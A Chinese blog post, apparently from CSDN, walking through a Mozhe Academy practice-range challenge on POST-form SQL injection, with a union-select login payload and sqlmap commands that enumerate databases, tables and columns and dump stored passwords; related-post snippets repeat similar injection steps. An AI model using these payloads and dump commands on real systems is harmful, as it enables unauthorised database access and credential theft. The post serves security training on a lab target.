墨者学院(POST注入)

于 2024-05-19 18:10:52 发布
阅读量422 收藏 8
点赞数 9
分类专栏: 网络安全 kali 数据库 文章标签: 安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77578012/article/details/139046021
版权
网络安全 同时被 3 个专栏收录
16 篇文章 0 订阅
订阅专栏
kali
3 篇文章 0 订阅
订阅专栏
数据库
2 篇文章 0 订阅
订阅专栏

题记:今天本来打算在mozhe找个POST注入练练手工注入,结果直接爆出来了(汗颜),真实浪费了我的3个币(啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊,你还我!!!!!!!!)

所以本着买都买了的心,给大家看看sqlmap怎么跑的!

payload:
name=admin' union select 1,2,3 #&password=admin

一、实验准备

1.墨者靶场(POST注入)

2.sqlmap工具(主要)

3.burpsuite工具

(如果大家对工具有需求的话可以q我哈)

二、工具小子闪亮登场

1.查询注入点

第一种:使用数据包查询

使用burpsuite抓包放在1.txt文件中,并且1.txt放在sqlmap工具相同目录,在需要测试参数后加*

payload:

Python sqlmap.py -r 1.txt

发现存在注入点,并且给出了我们具体执行的payload格式

第二种:使用POST格式url查询

同时--data参数后所跟数据也可以通过抓包获取

payload:

Python sqlmap.py -u “http://124.70.71.251:41800//login.php” --data “name=admin&password=admin”

2.顺风顺水之路之库名、表名、列名、字段值

(1)查询数据库名

对于第二种方法只需修改对应参数即可所以不在做重复演示

paylaod:python sqlmap.py -r 1.txt --dbs

(2)查询表名

paylaod:python sqlmap.py -r 1.txt -D "mozhe_Discuz_StormGroup" --tables

(3)查询列名

paylaod:python sqlmap.py -r 1.txt -D "mozhe_Discuz_StormGroup" -T "StormGroup_member" --columns

(4)查询字段值

paylaod:python sqlmap.py -r 1.txt -D "mozhe_Discuz_StormGroup" -T "StormGroup_member"  -C "password,name" --dump --threads=10

注意:此处--threads=10表示线程数为10,最大值!!!

至此完毕!!!!

有任何疑问可以私信

cen难取名
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
spring IOC实现(墨者革离)
12-12
在这个名为"spring_IOC实现(墨者革离)"的项目中,我们可以通过模拟城门叩问的编剧场景来理解这一概念。 首先,控制反转的基本思想是将对象的创建和依赖关系的管理从应用程序中分离出来,交给一个外部容器(在...
墨者学院-入门级-SQL注入漏洞测试(布尔盲注)-小白必看(超详细)
kitiu666的博客
08-26 4087
2020年8月25日,第五次渗透测试。 通过对sql语句进行注入,数据库的库名,表名,字段进步爆破,最终获得key。 准备需求: 1.windows系统pc 2.2.burpsuite(bp)抓包软件 3.sqlmap sql 数据库的爆破工具 1.进入靶场 ...
墨者学院-XWAY科技管理系统V3.0
lianliandad的博客
09-15 3316
妙啊
记在墨者学院业务逻辑漏洞靶场实战感受
weixin_50146421的博客
06-10 740
思路:观察第一个页面需要重置171手机号密码,第二个页面中有四个输入表单,未知的是验证码,所以从验证码下手,在一个看说明,即188手机号已经注册,也就是188可以收到验证码,那么可不可以直接用188手机号获取到验证码,然后用来给171重置密码呢?思路:可以观察余额为1,书的价格超出预算,可以拿bp抓包,然后修改书的价格,达成0元购买,观察bi11和bi22参数分别为10 20 ,对应书的价格,将其改为0,然后放行数据包 即可找到key。防止在登录页面,注册页面,密码修改页面等出现逻辑错误。
墨者学院—网络安全篇1
博客
09-16 215
题目目录某防火墙默认口令浏览器信息伪造 某防火墙默认口令 背景介绍 安全工程师"墨者"对某公司进行授权测试时,扫描公网IP时发现当前公司在网络边界部署了某型号防火墙,并且公网可以访问防火墙的WEB页面。 实训目标 1、掌握查看当前设备类型的方法; 2、了解网络(安全)设备的登录控制方式; 3、了解网络(安全)设备的默认口令获取方式; 4、了解当前型号防火墙的不同账户的区别; 5、了解在网络信息安全中的权限最小化、权限分离作用; 解题方向 找到防火墙的默认口令进行登录。 解题思路 开启靶场环境 查看源代码
墨者学院 - SQL手工注入漏洞测试(PostgreSQL数据库)
多崎巡礼的博客
08-20 3272
postgreSQL注入和mysql注入语法是类似的,有一点小的差异: postgreSQL查询当前数据库使用:current_database()函数; 在pg_stat_user_tables库查询表名,使用relname关键字; 和MySQL的limit使用有差异,语法为limit 1 offset 0。     手工SQL注入过程,数据库执行的语句,是页面提交至服务器应用程序,...
墨者安全专家
07-04
墨者安全专家是一款永久免费的免疫型安全防护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用...
墨者未必黑.pdf
12-26
墨者未必黑.pdf
墨者安全专家 3.7(更新)
11-03
1、墨者革离术 运用了墨者研发的新技术,结合权限管理的功能,有效防止防火墙和杀毒软件尚未识别的安全危险入侵,并在病毒库反应前把系统与安全隐患完全隔离,有效防止木马盗号等。 2、墨者查杀病毒 兼容主流杀毒...
墨者学院——SQL注入漏洞测试(POST)
2303_76679642的博客
04-23 652
6.找字段内容“sqlmap -r post.txt --level 5 --risk 3 -D 数据库名 -T 数据表名 -C (字段1,字段2,....) --dump --dbms mysql --batch”5.找数据库表里面的字段“sqlmap -r post.txt --level 5 --risk 3 -D 数据库名 -T 数据表名 --columns --dbms mysql --batch”测试环境为Kali Linux。
墨者学院】WebShell文件上传漏洞分析溯源(第2题)
m0_66835614的博客
11-28 1193
墨者学院】WebShell文件上传漏洞分析溯源(第2题)
墨者学院靶场自动解题
最新发布
qq_55733466的博客
09-07 343
本文演示了python程序自动进行靶场解题的效果。
墨者学院—网络安全篇3
博客
09-17 1492
文章目录投票常见漏洞分析溯源标题 投票常见漏洞分析溯源 背景介绍 小墨在微信群里面收到一个关于“家乡美”最美乡村评选微信投票,小墨想让自己的家乡成为第一名 实训目标 1、User-Agent的理解 2、X-Forwarded-for的理解 3、使用BurpSuite工具修改内容 解题方向 根据页面提示,进行投票测试 解题步骤 首先开启靶场环境 点击进入微信投票,根据提示 我们需要把a2019的票数刷到第一名 提示要用微信打开 我们使用浏览器信息伪造 标题 ...
墨者学院——SQL注入漏洞测试(布尔盲注)
2303_76679642的博客
04-21 393
9.最后看字段值: sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 -C (字段1,字段2,....) --dump --dbms mysql --batch。8.接着来查找表的字段:sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 --columns --dbms mysql --batch。id=1 and 1=1,内容显示, 判断这个id的值类型是数字类型。
PostgreSQL数据库注入-墨者学院(SQL手工注入漏洞测试(PostgreSQL数据库))
T1ngSh0w的博客
09-06 1480
PostgreSQL数据库注入-墨者学院-SQL手工注入漏洞测试(PostgreSQL数据库)
墨者 - SQL手工注入漏洞测试(PostgreSQL数据库)
吃肉唐僧的博客
07-09 1070
用order by测试字段数 字段为4 测试回显位置 /new_list.php?id=1 and 1=2 union select '1','2','3','4' 暴库 /new_list.php?id=1 and 1=2 union select '1',(select current_database()),'3','4' 爆表 ,这里有两种方法...
墨者学院-入门级-SQL手工注入漏洞测试(MySQL数据库)-小白必看(超详细)
kitiu666的博客
04-26 1073
2021年2月2日,第八次渗透测试。 这次实践SQL的盲注,知识点比较多,除了实验的讲述还会加上知识点的讲解; 测试寻找注入口: 1,、进入靶场,发现界面和之前做过的实验一样,我们需要进入“维护通知的地址”进行说起来的注入; 2、我们直接进在地址栏进行SQL语句的注入测试; 在地址栏加上语句“and 1=1”,页面可以正常显示。再尝试加入语句“and 1=2”,页面显示出错,没有了相关内容。说明地址栏是一个sql 的一个注入口;(原理说明可以看我之前做过的实验博客) sql语句注入: 3、发现了注入
墨者学院sql注入布尔
07-27
墨者学院SQL注入布尔是一种常见的SQL注入攻击技术,它利用布尔逻辑来判断SQL查询的真假条件。通过构造恰当的SQL语句,攻击者可以绕过输入验证,直接操作数据库,从而获取、修改或删除敏感数据。 在布尔注入攻击中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值